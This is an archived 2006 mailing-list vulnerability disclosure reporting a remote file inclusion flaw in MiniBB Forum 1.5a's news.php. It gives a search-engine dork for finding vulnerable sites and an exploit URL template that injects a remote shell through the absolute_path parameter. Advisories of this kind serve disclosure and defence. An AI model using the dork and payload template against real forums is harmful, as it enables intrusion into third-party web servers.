OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
MiniBB Forum <= 1.5a Remote File Include (news.php)

From: AG Spider (ag-spiderhotmail.com)
Date: Thu Jul 20 2006 - 10:44:10 CDT


Title : MiniBB Forum <= 1.5a Remote File Include (news.php)
###############################################################################

Discovered By AG-Spider

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 1.5a (news.php)version : version [ 1.5 ]
exploit :Remote File Include
-----------------------------------------------------------------------------

dork : "Powered by miniBB 1.5 ©"
Exploit :
http://[target]/news.php?absolute_path=[shellcode]?
----------------------------------------------------------------------------

greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy]

done

_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters!
http://www.msn.co.uk/newsletters